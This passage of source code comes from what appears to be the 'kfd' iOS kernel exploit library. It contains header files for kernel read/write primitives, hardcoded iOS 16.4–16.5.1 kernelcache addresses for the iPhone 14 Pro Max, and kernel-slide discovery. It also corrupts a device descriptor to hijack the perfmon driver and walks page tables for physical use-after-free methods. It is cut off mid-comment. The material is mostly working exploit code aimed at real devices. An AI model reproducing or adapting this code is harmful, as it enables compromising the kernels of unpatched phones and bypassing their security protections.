kfd->kwrite.krkw_object_size = sizeof(struct fileproc); 12 | 13 | kfd->kwrite.krkw_method_data_size = kfd->kread.krkw_method_data_size; 14 | kfd->kwrite.krkw_method_data = kfd->kread.krkw_method_data; 15 | } 16 | 17 | void kwrite_sem_open_allocate(struct kfd* kfd, u64 id) 18 | { 19 | if (id == 0) { 20 | id = kfd->kwrite.krkw_allocated_id = kfd->kread.krkw_allocated_id; 21 | if (kfd->kwrite.krkw_allocated_id == kfd->kwrite.krkw_maximum_id) { 22 | /* 23 | * Decrement krkw_allocated_id to account for increment in 24 | * krkw_helper_run_allocate(), because we return without allocating. 25 | */ 26 | kfd->kwrite.krkw_allocated_id--; 27 | return; 28 | } 29 | } 30 | 31 | /* 32 | * Just piggyback. 33 | */ 34 | kread_sem_open_allocate(kfd, id); 35 | } 36 | 37 | bool kwrite_sem_open_search(struct kfd* kfd, u64 object_uaddr) 38 | { 39 | /* 40 | * Just piggyback. 41 | */ 42 | return kwrite_dup_search(kfd, object_uaddr); 43 | } 44 | 45 | void kwrite_sem_open_kwrite(struct kfd* kfd, void* uaddr, u64 kaddr, u64 size) 46 | { 47 | /* 48 | * Just piggyback. 49 | */ 50 | kwrite_dup_kwrite(kfd, uaddr, kaddr, size); 51 | } 52 | 53 | void kwrite_sem_open_find_proc(struct kfd* kfd) 54 | { 55 | /* 56 | * Assume that kread is responsible for that. 57 | */ 58 | return; 59 | } 60 | 61 | void kwrite_sem_open_deallocate(struct kfd* kfd, u64 id) 62 | { 63 | /* 64 | * Skip the deallocation for the kread object because we are 65 | * responsible for deallocating all the shared file descriptors. 66 | */ 67 | if (id != kfd->kread.krkw_object_id) { 68 | i32* fds = (i32*)(kfd->kwrite.krkw_method_data); 69 | assert_bsd(close(fds[id])); 70 | } 71 | } 72 | 73 | void kwrite_sem_open_free(struct kfd* kfd) 74 | { 75 | /* 76 | * Note that we are responsible to deallocate the kread object, but we must 77 | * discard its object id because of the check in kwrite_sem_open_deallocate(). 78 | */ 79 | u64 kread_id = kfd->kread.krkw_object_id; 80 | kfd->kread.krkw_object_id = (-1); 81 | kwrite_sem_open_deallocate(kfd, kread_id); 82 | kwrite_sem_open_deallocate(kfd, kfd->kwrite.krkw_object_id); 83 | kwrite_sem_open_deallocate(kfd, kfd->kwrite.krkw_maximum_id); 84 | } 85 | 86 | #endif /* kwrite_sem_open_h */ 87 | -------------------------------------------------------------------------------- /kfd/libkfd/perf.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 2023 Félix Poulin-Bélanger. All rights reserved. 3 | */ 4 | 5 | #ifndef perf_h 6 | #define perf_h 7 | 8 | // Forward declarations for helper functions. 9 | u64 phystokv(struct kfd* kfd, u64 pa); 10 | u64 vtophys(struct kfd* kfd, u64 va); 11 | 12 | struct kernelcache_addresses { 13 | u64 kernel_base; 14 | u64 vn_kqfilter; // "Invalid knote filter on a vnode!" 15 | u64 ptov_table; // "%s: illegal PA: 0x%llx; phys base 0x%llx, size 0x%llx" 16 | u64 gVirtBase; // "%s: illegal PA: 0x%llx; phys base 0x%llx, size 0x%llx" 17 | u64 gPhysBase; // "%s: illegal PA: 0x%llx; phys base 0x%llx, size 0x%llx" 18 | u64 gPhysSize; // (gPhysBase + 0x8) 19 | u64 perfmon_devices; // "perfmon: %s: devfs_make_node_clone failed" 20 | u64 perfmon_dev_open; // "perfmon: attempt to open unsupported source: 0x%x" 21 | u64 cdevsw; // "Can't mark ptc as kqueue ok" 22 | u64 vm_pages; // "pmap_startup(): too many pages to support vm_page packing" 23 | u64 vm_page_array_beginning_addr; // "pmap_startup(): too many pages to support vm_page packing" 24 | u64 vm_page_array_ending_addr; // "pmap_startup(): too many pages to support vm_page packing" 25 | u64 vm_first_phys_ppnum; // "pmap_startup(): too many pages to support vm_page packing" 26 | }; 27 | 28 | const struct kernelcache_addresses kcs[] = { 29 | // An index of zero means that the version is unsupported. 30 | {}, 31 | // From the iOS 16.4 kernelcache for the iPhone 14 Pro Max. 32 | { 33 | .kernel_base = 0xfffffff007004000, 34 | .vn_kqfilter = 0xfffffff007f3960c, 35 | .ptov_table = 0xfffffff0078e7178, 36 | .gVirtBase = 0xfffffff0079320a8, 37 | .gPhysBase = 0xfffffff007933ed0, 38 | .gPhysSize = 0xfffffff007933ed8, 39 | .perfmon_devices = 0xfffffff00a44f500, 40 | .perfmon_dev_open = 0xfffffff007eecd3c, 41 | .cdevsw = 0xfffffff00a411208, 42 | .vm_pages = 0xfffffff0078e3eb8, 43 | .vm_page_array_beginning_addr = 0xfffffff0078e6128, 44 | .vm_page_array_ending_addr = 0xfffffff00a44e988, 45 | .vm_first_phys_ppnum = 0xfffffff00a44e990, 46 | }, 47 | // From the iOS 16.5 kernelcache for the iPhone 14 Pro Max. 48 | { 49 | .kernel_base = 0xfffffff007004000, 50 | .vn_kqfilter = 0xfffffff007f39b28, 51 | .ptov_table = 0xfffffff0078e7178, 52 | .gVirtBase = 0xfffffff0079321e8, 53 | .gPhysBase = 0xfffffff007934010, 54 | .gPhysSize = 0xfffffff007934018, 55 | .perfmon_devices = 0xfffffff00a457500, 56 | .perfmon_dev_open = 0xfffffff007eecfc0, 57 | .cdevsw = 0xfffffff00a419208, 58 | .vm_pages = 0xfffffff0078e3eb8, 59 | .vm_page_array_beginning_addr = 0xfffffff0078e6128, 60 | .vm_page_array_ending_addr = 0xfffffff00a456988, 61 | .vm_first_phys_ppnum = 0xfffffff00a456990, 62 | }, 63 | // From the iOS 16.5.1 kernelcache for the iPhone 14 Pro Max. 64 | { 65 | .kernel_base = 0xfffffff007004000, 66 | .vn_kqfilter = 0xfffffff007f39c18, 67 | .ptov_table = 0xfffffff0078e7178, 68 | .gVirtBase = 0xfffffff007932288, 69 | .gPhysBase = 0xfffffff0079340b0, 70 | .gPhysSize = 0xfffffff0079340b8, 71 | .perfmon_devices = 0xfffffff00a457500, 72 | .perfmon_dev_open = 0xfffffff007eed0b0, 73 | .cdevsw = 0xfffffff00a419208, 74 | .vm_pages = 0xfffffff0078e3eb8, 75 | .vm_page_array_beginning_addr = 0xfffffff0078e6128, 76 | .vm_page_array_ending_addr = 0xfffffff00a456988, 77 | .vm_first_phys_ppnum = 0xfffffff00a456990, 78 | } 79 | }; 80 | 81 | void perf_kread(struct kfd* kfd, u64 kaddr, void* uaddr, u64 size) 82 | { 83 | assert((size != 0) && (size <= UINT16_MAX)); 84 | assert(kfd->perf.shared_page.uaddr); 85 | assert(kfd->perf.shared_page.kaddr); 86 | 87 | volatile struct perfmon_config* config = (volatile struct perfmon_config*)(kfd->perf.shared_page.uaddr); 88 | *config = (volatile struct perfmon_config){}; 89 | config->pc_spec.ps_events = (struct perfmon_event*)(kaddr); 90 | config->pc_spec.ps_event_count = (u16)(size); 91 | 92 | struct perfmon_spec spec_buffer = {}; 93 | spec_buffer.ps_events = (struct perfmon_event*)(uaddr); 94 | spec_buffer.ps_event_count = (u16)(size); 95 | assert_bsd(ioctl(kfd->perf.dev.fd, PERFMON_CTL_SPECIFY, &spec_buffer)); 96 | 97 | *config = (volatile struct perfmon_config){}; 98 | } 99 | 100 | void perf_kwrite(struct kfd* kfd, void* uaddr, u64 kaddr, u64 size) 101 | { 102 | assert((size != 0) && ((size % sizeof(u64)) == 0)); 103 | assert(kfd->perf.shared_page.uaddr); 104 | assert(kfd->perf.shared_page.kaddr); 105 | 106 | volatile struct perfmon_config* config = (volatile struct perfmon_config*)(kfd->perf.shared_page.uaddr); 107 | volatile struct perfmon_source* source = (volatile struct perfmon_source*)(kfd->perf.shared_page.uaddr + sizeof(*config)); 108 | volatile struct perfmon_event* event = (volatile struct perfmon_event*)(kfd->perf.shared_page.uaddr + sizeof(*config) + sizeof(*source)); 109 | 110 | u64 source_kaddr = kfd->perf.shared_page.kaddr + sizeof(*config); 111 | u64 event_kaddr = kfd->perf.shared_page.kaddr + sizeof(*config) + sizeof(*source); 112 | 113 | for (u64 i = 0; i < (size / sizeof(u64)); i++) { 114 | *config = (volatile struct perfmon_config){}; 115 | *source = (volatile struct perfmon_source){}; 116 | *event = (volatile struct perfmon_event){}; 117 | 118 | config->pc_source = (struct perfmon_source*)(source_kaddr); 119 | config->pc_spec.ps_events = (struct perfmon_event*)(event_kaddr); 120 | config->pc_counters = (struct perfmon_counter*)(kaddr + (i * sizeof(u64))); 121 | 122 | source->ps_layout.pl_counter_count = 1; 123 | source->ps_layout.pl_fixed_offset = 1; 124 | 125 | struct perfmon_event event_buffer = {}; 126 | u64 kvalue = ((volatile u64*)(uaddr))[i]; 127 | event_buffer.pe_number = kvalue; 128 | assert_bsd(ioctl(kfd->perf.dev.fd, PERFMON_CTL_ADD_EVENT, &event_buffer)); 129 | } 130 | 131 | *config = (volatile struct perfmon_config){}; 132 | *source = (volatile struct perfmon_source){}; 133 | *event = (volatile struct perfmon_event){}; 134 | } 135 | 136 | void perf_init(struct kfd* kfd) 137 | { 138 | char hw_model[16] = {}; 139 | usize size = sizeof(hw_model); 140 | assert_bsd(sysctlbyname("hw.model", hw_model, &size, NULL, 0)); 141 | print_string(hw_model); 142 | 143 | const char iphone_14_pro_max[] = "D74AP"; 144 | if (memcmp(hw_model, iphone_14_pro_max, sizeof(iphone_14_pro_max))) { 145 | kfd->perf.kernelcache_index = 0; 146 | return; 147 | } 148 | 149 | switch (*(u64*)(&kfd->info.env.osversion)) { 150 | case ios_16_4: { 151 | kfd->perf.kernelcache_index = 1; 152 | break; 153 | } 154 | case ios_16_5: { 155 | kfd->perf.kernelcache_index = 2; 156 | break; 157 | } 158 | case ios_16_5_1: { 159 | kfd->perf.kernelcache_index = 3; 160 | break; 161 | } 162 | default: { 163 | kfd->perf.kernelcache_index = 0; 164 | return; 165 | } 166 | } 167 | 168 | /* 169 | * Allocate a page that will be used as a shared buffer between user space and kernel space. 170 | */ 171 | vm_address_t shared_page_address = 0; 172 | vm_size_t shared_page_size = pages(1); 173 | assert_mach(vm_allocate(mach_task_self(), &shared_page_address, shared_page_size, VM_FLAGS_ANYWHERE)); 174 | memset((void*)(shared_page_address), 0, shared_page_size); 175 | kfd->perf.shared_page.uaddr = shared_page_address; 176 | kfd->perf.shared_page.size = shared_page_size; 177 | } 178 | 179 | void perf_run(struct kfd* kfd) 180 | { 181 | if (!kfd->perf.kernelcache_index) { 182 | return; 183 | } 184 | 185 | const struct kernelcache_addresses* kc = &kcs[kfd->perf.kernelcache_index]; 186 | 187 | /* 188 | * Open a "/dev/aes_0" descriptor, then use it to find the kernel slide. 189 | */ 190 | kfd->perf.dev.fd = open("/dev/aes_0", O_RDWR); 191 | assert(kfd->perf.dev.fd > 0); 192 | 193 | assert(kfd->info.kaddr.current_proc); 194 | u64 fd_ofiles_kaddr = kfd->info.kaddr.current_proc + dynamic_offsetof(proc, p_fd_fd_ofiles); 195 | u64 fd_ofiles = 0; 196 | kread((u64)(kfd), fd_ofiles_kaddr, &fd_ofiles, sizeof(fd_ofiles)); 197 | 198 | u64 fileproc_kaddr = unsign_kaddr(fd_ofiles) + (kfd->perf.dev.fd * sizeof(u64)); 199 | u64 fileproc = 0; 200 | kread((u64)(kfd), fileproc_kaddr, &fileproc, sizeof(fileproc)); 201 | 202 | u64 fp_glob_kaddr = fileproc + static_offsetof(fileproc, fp_glob); 203 | u64 fp_glob = 0; 204 | kread((u64)(kfd), fp_glob_kaddr, &fp_glob, sizeof(fp_glob)); 205 | 206 | u64 fg_ops_kaddr = unsign_kaddr(fp_glob) + static_offsetof(fileglob, fg_ops); 207 | u64 fg_ops = 0; 208 | kread((u64)(kfd), fg_ops_kaddr, &fg_ops, sizeof(fg_ops)); 209 | 210 | u64 fo_kqfilter_kaddr = unsign_kaddr(fg_ops) + static_offsetof(fileops, fo_kqfilter); 211 | u64 fo_kqfilter = 0; 212 | kread((u64)(kfd), fo_kqfilter_kaddr, &fo_kqfilter, sizeof(fo_kqfilter)); 213 | 214 | u64 vn_kqfilter = unsign_kaddr(fo_kqfilter); 215 | u64 kernel_slide = vn_kqfilter - kc->vn_kqfilter; 216 | u64 kernel_base = kc->kernel_base + kernel_slide; 217 | kfd->perf.kernel_slide = kernel_slide; 218 | print_x64(kfd->perf.kernel_slide); 219 | 220 | u32 mh_header[2] = {}; 221 | mh_header[0] = kread_sem_open_kread_u32(kfd, kernel_base); 222 | mh_header[1] = kread_sem_open_kread_u32(kfd, kernel_base + 4); 223 | assert(mh_header[0] == 0xfeedfacf); 224 | assert(mh_header[1] == 0x0100000c); 225 | 226 | /* 227 | * Set up some globals used by vm_page.h. 228 | */ 229 | u64 vm_pages_kaddr = kc->vm_pages + kernel_slide; 230 | u64 vm_page_array_beginning_addr_kaddr = kc->vm_page_array_beginning_addr + kernel_slide; 231 | u64 vm_page_array_ending_addr_kaddr = kc->vm_page_array_ending_addr + kernel_slide; 232 | u64 vm_first_phys_ppnum_kaddr = kc->vm_first_phys_ppnum + kernel_slide; 233 | kread((u64)(kfd), vm_pages_kaddr, &vm_pages, sizeof(vm_pages)); 234 | kread((u64)(kfd), vm_page_array_beginning_addr_kaddr, &vm_page_array_beginning_addr, sizeof(vm_page_array_beginning_addr)); 235 | kread((u64)(kfd), vm_page_array_ending_addr_kaddr, &vm_page_array_ending_addr, sizeof(vm_page_array_ending_addr)); 236 | vm_first_phys_ppnum = kread_sem_open_kread_u32(kfd, vm_first_phys_ppnum_kaddr); 237 | 238 | /* 239 | * Corrupt the "/dev/aes_0" descriptor into a "/dev/perfmon_core" descriptor. 240 | */ 241 | u64 fg_data_kaddr = unsign_kaddr(fp_glob) + static_offsetof(fileglob, fg_data); 242 | u64 fg_data = 0; 243 | kread((u64)(kfd), fg_data_kaddr, &fg_data, sizeof(fg_data)); 244 | 245 | u64 v_specinfo_kaddr = unsign_kaddr(fg_data) + 0x0078; // offsetof(struct vnode, v_specinfo) 246 | u64 v_specinfo = 0; 247 | kread((u64)(kfd), v_specinfo_kaddr, &v_specinfo, sizeof(v_specinfo)); 248 | 249 | kfd->perf.dev.si_rdev_kaddr = unsign_kaddr(v_specinfo) + 0x0018; // offsetof(struct specinfo, si_rdev) 250 | kread((u64)(kfd), kfd->perf.dev.si_rdev_kaddr, &kfd->perf.dev.si_rdev_buffer, sizeof(kfd->perf.dev.si_rdev_buffer)); 251 | 252 | u64 cdevsw_kaddr = kc->cdevsw + kernel_slide; 253 | u64 perfmon_dev_open_kaddr = kc->perfmon_dev_open + kernel_slide; 254 | u64 cdevsw[14] = {}; 255 | u32 dev_new_major = 0; 256 | for (u64 dmaj = 0; dmaj < 64; dmaj++) { 257 | u64 kaddr = cdevsw_kaddr + (dmaj * sizeof(cdevsw)); 258 | kread((u64)(kfd), kaddr, &cdevsw, sizeof(cdevsw)); 259 | u64 d_open = unsign_kaddr(cdevsw[0]); 260 | if (d_open == perfmon_dev_open_kaddr) { 261 | dev_new_major = (dmaj << 24); 262 | break; 263 | } 264 | } 265 | 266 | assert(dev_new_major == 0x11000000); 267 | 268 | u32 new_si_rdev_buffer[2] = {}; 269 | new_si_rdev_buffer[0] = dev_new_major; 270 | new_si_rdev_buffer[1] = kfd->perf.dev.si_rdev_buffer[1] + 1; 271 | kwrite((u64)(kfd), &new_si_rdev_buffer, kfd->perf.dev.si_rdev_kaddr, sizeof(new_si_rdev_buffer)); 272 | 273 | /* 274 | * Find ptov_table, gVirtBase, gPhysBase, gPhysSize, TTBR0 and TTBR1. 275 | */ 276 | u64 ptov_table_kaddr = kc->ptov_table + kernel_slide; 277 | kread((u64)(kfd), ptov_table_kaddr, &kfd->perf.ptov_table, sizeof(kfd->perf.ptov_table)); 278 | 279 | u64 gVirtBase_kaddr = kc->gVirtBase + kernel_slide; 280 | kread((u64)(kfd), gVirtBase_kaddr, &kfd->perf.gVirtBase, sizeof(kfd->perf.gVirtBase)); 281 | print_x64(kfd->perf.gVirtBase); 282 | 283 | u64 gPhysBase_kaddr = kc->gPhysBase + kernel_slide; 284 | kread((u64)(kfd), gPhysBase_kaddr, &kfd->perf.gPhysBase, sizeof(kfd->perf.gPhysBase)); 285 | print_x64(kfd->perf.gPhysBase); 286 | 287 | u64 gPhysSize_kaddr = kc->gPhysSize + kernel_slide; 288 | kread((u64)(kfd), gPhysSize_kaddr, &kfd->perf.gPhysSize, sizeof(kfd->perf.gPhysSize)); 289 | print_x64(kfd->perf.gPhysSize); 290 | 291 | assert(kfd->info.kaddr.current_pmap); 292 | u64 ttbr0_va_kaddr = kfd->info.kaddr.current_pmap + static_offsetof(pmap, tte); 293 | u64 ttbr0_pa_kaddr = kfd->info.kaddr.current_pmap + static_offsetof(pmap, ttep); 294 | kread((u64)(kfd), ttbr0_va_kaddr, &kfd->perf.ttbr[0].va, sizeof(kfd->perf.ttbr[0].va)); 295 | kread((u64)(kfd), ttbr0_pa_kaddr, &kfd->perf.ttbr[0].pa, sizeof(kfd->perf.ttbr[0].pa)); 296 | assert(phystokv(kfd, kfd->perf.ttbr[0].pa) == kfd->perf.ttbr[0].va); 297 | 298 | assert(kfd->info.kaddr.kernel_pmap); 299 | u64 ttbr1_va_kaddr = kfd->info.kaddr.kernel_pmap + static_offsetof(pmap, tte); 300 | u64 ttbr1_pa_kaddr = kfd->info.kaddr.kernel_pmap + static_offsetof(pmap, ttep); 301 | kread((u64)(kfd), ttbr1_va_kaddr, &kfd->perf.ttbr[1].va, sizeof(kfd->perf.ttbr[1].va)); 302 | kread((u64)(kfd), ttbr1_pa_kaddr, &kfd->perf.ttbr[1].pa, sizeof(kfd->perf.ttbr[1].pa)); 303 | assert(phystokv(kfd, kfd->perf.ttbr[1].pa) == kfd->perf.ttbr[1].va); 304 | 305 | /* 306 | * Find the shared page in kernel space. 307 | */ 308 | kfd->perf.shared_page.paddr = vtophys(kfd, kfd->perf.shared_page.uaddr); 309 | kfd->perf.shared_page.kaddr = phystokv(kfd, kfd->perf.shared_page.paddr); 310 | 311 | /* 312 | * Set up the perfmon device use for the master kread and kwrite: 313 | * - perfmon_devices[0][0].pmdv_config = kfd->perf.shared_page.kaddr 314 | * - perfmon_devices[0][0].pmdv_allocated = true 315 | */ 316 | struct perfmon_device perfmon_device = {}; 317 | u64 perfmon_device_kaddr = kc->perfmon_devices + kernel_slide; 318 | u8* perfmon_device_uaddr = (u8*)(&perfmon_device); 319 | kread((u64)(kfd), perfmon_device_kaddr, &perfmon_device, sizeof(perfmon_device)); 320 | assert((perfmon_device.pmdv_mutex[0] & 0xffffff00ffffffff) == 0x0000000022000000); 321 | 322 | perfmon_device.pmdv_mutex[1] = (-1); 323 | perfmon_device.pmdv_config = (struct perfmon_config*)(kfd->perf.shared_page.kaddr); 324 | perfmon_device.pmdv_allocated = true; 325 | 326 | kwrite((u64)(kfd), perfmon_device_uaddr + 12, perfmon_device_kaddr + 12, sizeof(u64)); 327 | ((volatile u32*)(perfmon_device_uaddr))[4] = 0; 328 | kwrite((u64)(kfd), perfmon_device_uaddr + 16, perfmon_device_kaddr + 16, sizeof(u64)); 329 | ((volatile u32*)(perfmon_device_uaddr))[5] = 0; 330 | kwrite((u64)(kfd), perfmon_device_uaddr + 20, perfmon_device_kaddr + 20, sizeof(u64)); 331 | kwrite((u64)(kfd), perfmon_device_uaddr + 24, perfmon_device_kaddr + 24, sizeof(u64)); 332 | kwrite((u64)(kfd), perfmon_device_uaddr + 28, perfmon_device_kaddr + 28, sizeof(u64)); 333 | 334 | kfd->perf.saved_kread = kfd->kread.krkw_method_ops.kread; 335 | kfd->perf.saved_kwrite = kfd->kwrite.krkw_method_ops.kwrite; 336 | kfd->kread.krkw_method_ops.kread = perf_kread; 337 | kfd->kwrite.krkw_method_ops.kwrite = perf_kwrite; 338 | } 339 | 340 | void perf_free(struct kfd* kfd) 341 | { 342 | if (!kfd->perf.kernelcache_index) { 343 | return; 344 | } 345 | 346 | kfd->kread.krkw_method_ops.kread = kfd->perf.saved_kread; 347 | kfd->kwrite.krkw_method_ops.kwrite = kfd->perf.saved_kwrite; 348 | 349 | /* 350 | * Restore the "/dev/perfmon_core" descriptor back to the "/dev/aes_0" descriptor. 351 | * Then, close it and deallocate the shared page. 352 | * This leaves the first perfmon device "pmdv_allocated", which is fine. 353 | */ 354 | kwrite((u64)(kfd), &kfd->perf.dev.si_rdev_buffer, kfd->perf.dev.si_rdev_kaddr, sizeof(kfd->perf.dev.si_rdev_buffer)); 355 | 356 | assert_bsd(close(kfd->perf.dev.fd)); 357 | assert_mach(vm_deallocate(mach_task_self(), kfd->perf.shared_page.uaddr, kfd->perf.shared_page.size)); 358 | } 359 | 360 | /* 361 | * Helper perf functions. 362 | */ 363 | 364 | u64 phystokv(struct kfd* kfd, u64 pa) 365 | { 366 | const u64 PTOV_TABLE_SIZE = 8; 367 | const u64 gVirtBase = kfd->perf.gVirtBase; 368 | const u64 gPhysBase = kfd->perf.gPhysBase; 369 | const u64 gPhysSize = kfd->perf.gPhysSize; 370 | const struct ptov_table_entry* ptov_table = &kfd->perf.ptov_table[0]; 371 | 372 | for (u64 i = 0; (i < PTOV_TABLE_SIZE) && (ptov_table[i].len != 0); i++) { 373 | if ((pa >= ptov_table[i].pa) && (pa < (ptov_table[i].pa + ptov_table[i].len))) { 374 | return pa - ptov_table[i].pa + ptov_table[i].va; 375 | } 376 | } 377 | 378 | assert(!((pa < gPhysBase) || ((pa - gPhysBase) >= gPhysSize))); 379 | return pa - gPhysBase + gVirtBase; 380 | } 381 | 382 | u64 vtophys(struct kfd* kfd, u64 va) 383 | { 384 | const u64 ROOT_LEVEL = PMAP_TT_L1_LEVEL; 385 | const u64 LEAF_LEVEL = PMAP_TT_L3_LEVEL; 386 | 387 | u64 pa = 0; 388 | u64 tt_kaddr = (va >> 63) ? kfd->perf.ttbr[1].va : kfd->perf.ttbr[0].va; 389 | 390 | for (u64 cur_level = ROOT_LEVEL; cur_level <= LEAF_LEVEL; cur_level++) { 391 | u64 offmask, shift, index_mask, valid_mask, type_mask, type_block; 392 | switch (cur_level) { 393 | case PMAP_TT_L0_LEVEL: { 394 | offmask = ARM_16K_TT_L0_OFFMASK; 395 | shift = ARM_16K_TT_L0_SHIFT; 396 | index_mask = ARM_16K_TT_L0_INDEX_MASK; 397 | valid_mask = ARM_TTE_VALID; 398 | type_mask = ARM_TTE_TYPE_MASK; 399 | type_block = ARM_TTE_TYPE_BLOCK; 400 | break; 401 | } 402 | case PMAP_TT_L1_LEVEL: { 403 | offmask = ARM_16K_TT_L1_OFFMASK; 404 | shift = ARM_16K_TT_L1_SHIFT; 405 | index_mask = ARM_16K_TT_L1_INDEX_MASK; 406 | valid_mask = ARM_TTE_VALID; 407 | type_mask = ARM_TTE_TYPE_MASK; 408 | type_block = ARM_TTE_TYPE_BLOCK; 409 | break; 410 | } 411 | case PMAP_TT_L2_LEVEL: { 412 | offmask = ARM_16K_TT_L2_OFFMASK; 413 | shift = ARM_16K_TT_L2_SHIFT; 414 | index_mask = ARM_16K_TT_L2_INDEX_MASK; 415 | valid_mask = ARM_TTE_VALID; 416 | type_mask = ARM_TTE_TYPE_MASK; 417 | type_block = ARM_TTE_TYPE_BLOCK; 418 | break; 419 | } 420 | case PMAP_TT_L3_LEVEL: { 421 | offmask = ARM_16K_TT_L3_OFFMASK; 422 | shift = ARM_16K_TT_L3_SHIFT; 423 | index_mask = ARM_16K_TT_L3_INDEX_MASK; 424 | valid_mask = ARM_PTE_TYPE_VALID; 425 | type_mask = ARM_PTE_TYPE_MASK; 426 | type_block = ARM_TTE_TYPE_L3BLOCK; 427 | break; 428 | } 429 | default: { 430 | assert_false("bad pmap tt level"); 431 | return 0; 432 | } 433 | } 434 | 435 | u64 tte_index = (va & index_mask) >> shift; 436 | u64 tte_kaddr = tt_kaddr + (tte_index * sizeof(u64)); 437 | u64 tte = 0; 438 | kread((u64)(kfd), tte_kaddr, &tte, sizeof(tte)); 439 | 440 | if ((tte & valid_mask) != valid_mask) { 441 | return 0; 442 | } 443 | 444 | if ((tte & type_mask) == type_block) { 445 | pa = ((tte & ARM_TTE_PA_MASK & ~offmask) | (va & offmask)); 446 | break; 447 | } 448 | 449 | tt_kaddr = phystokv(kfd, tte & ARM_TTE_TABLE_MASK); 450 | } 451 | 452 | return pa; 453 | } 454 | 455 | #endif /* perf_h */ 456 | -------------------------------------------------------------------------------- /kfd/libkfd/puaf.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 2023 Félix Poulin-Bélanger. All rights reserved. 3 | */ 4 | 5 | #ifndef puaf_h 6 | #define puaf_h 7 | 8 | // Forward declarations for helper functions. 9 | void puaf_helper_get_vm_map_first_and_last(u64* first_out, u64* last_out); 10 | void puaf_helper_get_vm_map_min_and_max(u64* min_out, u64* max_out); 11 | void puaf_helper_give_ppl_pages(void); 12 | 13 | #include "puaf/physpuppet.h" 14 | #include "puaf/smith.h" 15 | 16 | #define puaf_method_case(method) \ 17 | case puaf_##method: { \ 18 | const char* method_name = #method; \ 19 | print_string(method_name); \ 20 | kfd->puaf.puaf_method_ops.init = method##_init; \ 21 | kfd->puaf.puaf_method_ops.run = method##_run; \ 22 | kfd->puaf.puaf_method_ops.cleanup = method##_cleanup; \ 23 | kfd->puaf.puaf_method_ops.free = method##_free; \ 24 | break; \ 25 | } 26 | 27 | void puaf_init(struct kfd* kfd, u64 puaf_pages, u64 puaf_method) 28 | { 29 | kfd->puaf.number_of_puaf_pages = puaf_pages; 30 | kfd->puaf.puaf_pages_uaddr = (u64*)(malloc_bzero(kfd->puaf.number_of_puaf_pages * sizeof(u64))); 31 | 32 | switch (puaf_method) { 33 | puaf_method_case(physpuppet) 34 | puaf_method_case(smith) 35 | } 36 | 37 | kfd->puaf.puaf_method_ops.init(kfd); 38 | } 39 | 40 | void puaf_run(struct kfd* kfd) 41 | { 42 | puaf_helper_give_ppl_pages(); 43 | 44 | timer_start(); 45 | kfd->puaf.puaf_method_ops.run(kfd); 46 | timer_end(); 47 | } 48 | 49 | void puaf_cleanup(struct kfd* kfd) 50 | { 51 | timer_start(); 52 | kfd->puaf.puaf_method_ops.cleanup(kfd); 53 | timer_end(); 54 | } 55 | 56 | void puaf_free(struct kfd* kfd) 57 | { 58 | kfd->puaf.puaf_method_ops.free(kfd); 59 | 60 | bzero_free(kfd->puaf.puaf_pages_uaddr, kfd->puaf.number_of_puaf_pages * sizeof(u64)); 61 | 62 | if (kfd->puaf.puaf_method_data) { 63 | bzero_free(kfd->puaf.puaf_method_data, kfd->puaf.puaf_method_data_size); 64 | } 65 | } 66 | 67 | /* 68 | * Helper puaf functions. 69 | */ 70 | 71 | void puaf_helper_get_vm_map_first_and_last(u64* first_out, u64* last_out) 72 | { 73 | u64 first_address = 0; 74 | u64 last_address = 0; 75 | 76 | vm_address_t address = 0; 77 | vm_size_t size = 0; 78 | vm_region_basic_info_data_64_t data = {}; 79 | vm_region_info_t info = (vm_region_info_t)(&data); 80 | mach_msg_type_number_t count = VM_REGION_BASIC_INFO_COUNT_64; 81 | mach_port_t port = MACH_PORT_NULL; 82 | 83 | while (true) { 84 | kern_return_t kret = vm_region_64(mach_task_self(), &address, &size, VM_REGION_BASIC_INFO_64, info, &count, &port); 85 | if (kret == KERN_INVALID_ADDRESS) { 86 | last_address = address; 87 | break; 88 | } 89 | 90 | assert(kret == KERN_SUCCESS); 91 | 92 | if (!first_address) { 93 | first_address = address; 94 | } 95 | 96 | address += size; 97 | size = 0; 98 | } 99 | 100 | *first_out = first_address; 101 | *last_out = last_address; 102 | } 103 | 104 | void puaf_helper_get_vm_map_min_and_max(u64* min_out, u64* max_out) 105 | { 106 | task_vm_info_data_t data = {}; 107 | task_info_t info = (task_info_t)(&data); 108 | mach_msg_type_number_t count = TASK_VM_INFO_COUNT; 109 | assert_mach(task_info(mach_task_self(), TASK_VM_INFO, info, &count)); 110 | 111 | *min_out = data.min_address; 112 | *max_out = data.max_address; 113 | } 114 | 115 | void puaf_helper_give_ppl_pages(void) 116 | { 117 | timer_start(); 118 | 119 | const u64 given_ppl_pages_max = 10000; 120 | const u64 l2_block_size = (1ull << 25); 121 | 122 | vm_address_t addresses[given_ppl_pages_max] = {}; 123 | vm_address_t address = 0; 124 | u64 given_ppl_pages = 0; 125 | 126 | u64 min_address, max_address; 127 | puaf_helper_get_vm_map_min_and_max(&min_address, &max_address); 128 | 129 | while (true) { 130 | address += l2_block_size; 131 | if (address < min_address) { 132 | continue; 133 | } 134 | 135 | if (address >= max_address) { 136 | break; 137 | } 138 | 139 | kern_return_t kret = vm_allocate(mach_task_self(), &address, pages(1), VM_FLAGS_FIXED); 140 | if (kret == KERN_SUCCESS) { 141 | memset((void*)(address), 'A', 1); 142 | addresses[given_ppl_pages] = address; 143 | if (++given_ppl_pages == given_ppl_pages_max) { 144 | break; 145 | } 146 | } 147 | } 148 | 149 | for (u64 i = 0; i < given_ppl_pages; i++) { 150 | assert_mach(vm_deallocate(mach_task_self(), addresses[i], pages(1))); 151 | } 152 | 153 | print_u64(given_ppl_pages); 154 | timer_end(); 155 | } 156 | 157 | #endif /* puaf_h */ 158 | -------------------------------------------------------------------------------- /kfd/libkfd/puaf/physpuppet.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 2023 Félix Poulin-Bélanger. All rights reserved. 3 | */ 4 | 5 | #ifndef physpuppet_h 6 | #define physpuppet_h 7 | 8 | const u64 physpuppet_vmne_size = pages(2) + 1; 9 | const u64 physpuppet_vme_offset = pages(1); 10 | const u64 physpuppet_vme_size = pages(2); 11 | 12 | void physpuppet_init(struct kfd* kfd) 13 | { 14 | /* 15 | * Nothing to do. 16 | */ 17 | return; 18 | } 19 | 20 | void physpuppet_run(struct kfd* kfd) 21 | { 22 | for (u64 i = 0; i < kfd->puaf.number_of_puaf_pages; i++) { 23 | /* 24 | * STEP 1: 25 | * 26 | * Create a 